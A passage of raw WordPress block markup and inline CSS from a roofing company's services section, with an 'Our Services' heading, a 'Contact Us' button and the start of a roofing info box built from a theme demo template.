style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"fead57cb-9c5c-411a-bb72-20bd150b5268\"} -->\n<style type=\"text/css\"> .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-fead57cb-9c5c-411a-bb72-20bd150b5268 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"leftPadding\":15,\"leftPaddingTablet\":15,\"blockId\":\"57952f87-1484-4ebd-851f-822a3d450cc3\"} -->\n<style type=\"text/css\"> .block-57952f87-1484-4ebd-851f-822a3d450cc3 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-57952f87-1484-4ebd-851f-822a3d450cc3 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-57952f87-1484-4ebd-851f-822a3d450cc3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 15px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-57952f87-1484-4ebd-851f-822a3d450cc3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 15px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-57952f87-1484-4ebd-851f-822a3d450cc3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-57952f87-1484-4ebd-851f-822a3d450cc3\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"b7d6108a-a14d-4498-85a9-8c42833b5557\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-b7d6108a-a14d-4498-85a9-8c42833b5557\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Our Services</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Roofing, Siding, Gutters, Repairs</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"rightPadding\":15,\"blockId\":\"63ddace3-1c17-4204-b706-d0b433daef69\"} -->\n<style type=\"text/css\"> .block-63ddace3-1c17-4204-b706-d0b433daef69 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-63ddace3-1c17-4204-b706-d0b433daef69 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-63ddace3-1c17-4204-b706-d0b433daef69 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 15px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-63ddace3-1c17-4204-b706-d0b433daef69 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-63ddace3-1c17-4204-b706-d0b433daef69 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-63ddace3-1c17-4204-b706-d0b433daef69\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"Contact Us\",\"link\":\"https://dunriteroof.com/contact us\",\"counterId\":\"3d60bfc1-b9eb-4ec8-9435-1256841854bd\",\"vPadding\":13,\"hPadding\":27,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 13px; padding-bottom: 13px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 27px; padding-right: 27px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://dunriteroof.com/contact us\" rel=\"noopener noreferrer\" target=\"_blank\">Contact Us</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"056cb894-6454-42df-942f-dfc188516e3c\",\"topPadding\":50,\"topPaddingMobile\":30,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"className\":\"gb-renovation-services\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services skt-blocks-block-section-outer-wrap block-056cb894-6454-42df-942f-dfc188516e3c background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-056cb894-6454-42df-942f-dfc188516e3c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-056cb894-6454-42df-942f-dfc188516e3c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 30px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-056cb894-6454-42df-942f-dfc188516e3c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-056cb894-6454-42df-942f-dfc188516e3c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-056cb894-6454-42df-942f-dfc188516e3c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-056cb894-6454-42df-942f-dfc188516e3c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-056cb894-6454-42df-942f-dfc188516e3c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-056cb894-6454-42df-942f-dfc188516e3c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-056cb894-6454-42df-942f-dfc188516e3c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-056cb894-6454-42df-942f-dfc188516e3c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-056cb894-6454-42df-942f-dfc188516e3c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-056cb894-6454-42df-942f-dfc188516e3c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-056cb894-6454-42df-942f-dfc188516e3c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-056cb894-6454-42df-942f-dfc188516e3c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-056cb894-6454-42df-942f-dfc188516e3c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":3,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"50e69a29-82aa-4d9a-8393-5d7206f14a34\"} -->\n<style type=\"text/css\"> .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-50e69a29-82aa-4d9a-8393-5d7206f14a34 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-3\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"8084ee78-5871-48ad-a7a9-1e3b52164921\",\"blockBorderRadius\":5,\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-8084ee78-5871-48ad-a7a9-1e3b52164921 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-8084ee78-5871-48ad-a7a9-1e3b52164921 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-8084ee78-5871-48ad-a7a9-1e3b52164921 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-8084ee78-5871-48ad-a7a9-1e3b52164921 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-8084ee78-5871-48ad-a7a9-1e3b52164921 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-8084ee78-5871-48ad-a7a9-1e3b52164921\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadingTag\":\"h4\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/roofing/\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"uploading\":false,\"date\":1622180355000,\"filename\":\"roofing.jpg\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"jpeg\",\"id\":259,\"title\":\"roofing\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/home/roofing-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"roofing-2\",\"status\":\"inherit\",\"modified\":1622180355000,\"mime\":\"image/jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 28, 2021\",\"nonces\":{\"update\":\"5f56d3c42c\",\"delete\":\"aef82b5b03\",\"edit\":\"25a8bb0d07\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=259u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":7947,\"filesizeHumanReadable\":\"8 KB\",\"context\":\"\",\"height\":65,\"width\":88,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\",\"height\":65,\"width\":88,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":88,\"resshowPrefix\":false,\"counterId\":\"dd2fb7db-992d-423c-ac16-d676e4901ec9\"} -->\n<style type=\"text/css\"> .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-image-content img {\n width: 88px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap 